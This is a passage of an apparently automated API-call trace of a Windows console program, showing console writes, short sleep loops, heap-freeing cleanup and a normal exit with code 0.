[0244.597] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0244.678] Sleep (dwMilliseconds=0x64) [0244.797] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0245.234] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x613f5b27 [0245.234] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x080") returned 2 [0245.234] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x1000d) returned 1 [0245.316] __iob_func () returned 0x75af1208 [0245.316] _fileno (_File=0x75af1228) returned 1 [0245.316] _errno () returned 0x45305b0 [0245.316] _get_osfhandle (_FileHandle=1) returned 0x3c [0245.316] _errno () returned 0x45305b0 [0245.316] GetFileType (hFile=0x3c) returned 0x2 [0245.316] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0245.316] GetFileType (hFile=0x3c) returned 0x2 [0245.316] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0245.455] __iob_func () returned 0x75af1208 [0245.455] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0245.455] lstrlenW (lpString="\x080") returned 2 [0245.455] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0245.533] Sleep (dwMilliseconds=0x64) [0245.860] __iob_func () returned 0x75af1208 [0245.860] _fileno (_File=0x75af1228) returned 1 [0245.860] _errno () returned 0x45305b0 [0245.860] _get_osfhandle (_FileHandle=1) returned 0x3c [0245.860] _errno () returned 0x45305b0 [0245.860] GetFileType (hFile=0x3c) returned 0x2 [0245.860] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0245.860] GetFileType (hFile=0x3c) returned 0x2 [0245.860] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0245.958] __iob_func () returned 0x75af1208 [0245.958] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0245.958] lstrlenW (lpString="\n") returned 1 [0245.958] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xf106c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xf106c*, lpNumberOfCharsWritten=0xdfa98*=0x1) returned 1 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cdb98) returned 1 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cdb98) returned 0xa0 [0246.046] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cdb98 | out: hHeap=0x47c0000) returned 1 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd180) returned 1 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cd180) returned 0x10 [0246.046] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd180 | out: hHeap=0x47c0000) returned 1 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc3e8) returned 1 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc3e8) returned 0x14 [0246.046] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc3e8 | out: hHeap=0x47c0000) returned 1 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.046] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c87f0) returned 1 [0246.046] GetProcessHeap () returned 0x47c0000 [0246.047] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c87f0) returned 0x4 [0246.047] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c87f0 | out: hHeap=0x47c0000) returned 1 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd0a8) returned 1 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cd0a8) returned 0x10 [0246.047] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd0a8 | out: hHeap=0x47c0000) returned 1 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc288) returned 1 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc288) returned 0x14 [0246.047] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc288 | out: hHeap=0x47c0000) returned 1 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc4c8) returned 1 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc4c8) returned 0x208 [0246.047] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc4c8 | out: hHeap=0x47c0000) returned 1 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7380) returned 1 [0246.047] GetProcessHeap () returned 0x47c0000 [0246.047] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7380) returned 0x10 [0246.047] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7380 | out: hHeap=0x47c0000) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc0e8) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc0e8) returned 0x14 [0246.048] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc0e8 | out: hHeap=0x47c0000) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47ce398) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47ce398) returned 0x200 [0246.048] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47ce398 | out: hHeap=0x47c0000) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd150) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cd150) returned 0x10 [0246.048] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd150 | out: hHeap=0x47c0000) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc148) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc148) returned 0x14 [0246.048] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc148 | out: hHeap=0x47c0000) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd1f8) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cd1f8) returned 0xa [0246.048] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd1f8 | out: hHeap=0x47c0000) returned 1 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] GetProcessHeap () returned 0x47c0000 [0246.048] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd1b0) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cd1b0) returned 0x10 [0246.049] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd1b0 | out: hHeap=0x47c0000) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc348) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc348) returned 0x14 [0246.049] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc348 | out: hHeap=0x47c0000) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd090) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cd090) returned 0xa [0246.049] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd090 | out: hHeap=0x47c0000) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd0f0) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cd0f0) returned 0x10 [0246.049] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cd0f0 | out: hHeap=0x47c0000) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc268) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc268) returned 0x14 [0246.049] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc268 | out: hHeap=0x47c0000) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6c00) returned 1 [0246.049] GetProcessHeap () returned 0x47c0000 [0246.049] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6c00) returned 0x2 [0246.049] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6c00 | out: hHeap=0x47c0000) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c82b8) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c82b8) returned 0x14 [0246.050] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c82b8 | out: hHeap=0x47c0000) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c70c8) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c70c8) returned 0x14 [0246.050] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c70c8 | out: hHeap=0x47c0000) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c72d8) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c72d8) returned 0x14 [0246.050] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c72d8 | out: hHeap=0x47c0000) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c2968) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c2968) returned 0x14 [0246.050] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c2968 | out: hHeap=0x47c0000) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc488) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc488) returned 0x14 [0246.050] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc488 | out: hHeap=0x47c0000) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.050] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc388) returned 1 [0246.050] GetProcessHeap () returned 0x47c0000 [0246.051] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc388) returned 0x14 [0246.051] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc388 | out: hHeap=0x47c0000) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c83e0) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c83e0) returned 0x30 [0246.051] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c83e0 | out: hHeap=0x47c0000) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc248) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc248) returned 0x14 [0246.051] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc248 | out: hHeap=0x47c0000) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c3818) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c3818) returned 0x24 [0246.051] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c3818 | out: hHeap=0x47c0000) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc308) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc308) returned 0x14 [0246.051] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc308 | out: hHeap=0x47c0000) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7948) returned 1 [0246.051] GetProcessHeap () returned 0x47c0000 [0246.051] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7948) returned 0x4c [0246.051] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7948 | out: hHeap=0x47c0000) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc3c8) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc3c8) returned 0x14 [0246.052] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc3c8 | out: hHeap=0x47c0000) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7500) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7500) returned 0x10 [0246.052] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7500 | out: hHeap=0x47c0000) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c36f8) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c36f8) returned 0x14 [0246.052] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c36f8 | out: hHeap=0x47c0000) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6e90) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6e90) returned 0x14 [0246.052] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6e90 | out: hHeap=0x47c0000) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6eb0) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6eb0) returned 0x14 [0246.052] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6eb0 | out: hHeap=0x47c0000) returned 1 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] GetProcessHeap () returned 0x47c0000 [0246.052] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6ed0) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6ed0) returned 0x14 [0246.053] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6ed0 | out: hHeap=0x47c0000) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7518) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7518) returned 0x10 [0246.053] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7518 | out: hHeap=0x47c0000) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c8788) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c8788) returned 0x14 [0246.053] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c8788 | out: hHeap=0x47c0000) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc448) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc448) returned 0x14 [0246.053] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc448 | out: hHeap=0x47c0000) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc428) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc428) returned 0x14 [0246.053] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc428 | out: hHeap=0x47c0000) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc168) returned 1 [0246.053] GetProcessHeap () returned 0x47c0000 [0246.053] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc168) returned 0x14 [0246.054] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc168 | out: hHeap=0x47c0000) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc108) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc108) returned 0x14 [0246.054] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc108 | out: hHeap=0x47c0000) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc368) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc368) returned 0x14 [0246.054] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc368 | out: hHeap=0x47c0000) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc128) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc128) returned 0x14 [0246.054] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc128 | out: hHeap=0x47c0000) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c73f8) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c73f8) returned 0x10 [0246.054] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c73f8 | out: hHeap=0x47c0000) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.054] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc228) returned 1 [0246.054] GetProcessHeap () returned 0x47c0000 [0246.055] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cc228) returned 0x14 [0246.055] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cc228 | out: hHeap=0x47c0000) returned 1 [0246.055] GetProcessHeap () returned 0x47c0000 [0246.055] GetProcessHeap () returned 0x47c0000 [0246.055] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c74e8) returned 1 [0246.055] GetProcessHeap () returned 0x47c0000 [0246.055] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c74e8) returned 0x10 [0246.055] HeapFree (in: hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c74e8 | out: hHeap=0x47c0000) returned 1 [0246.055] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0246.055] exit (_Code=0) Thread: id = 33 os_tid = 0xe44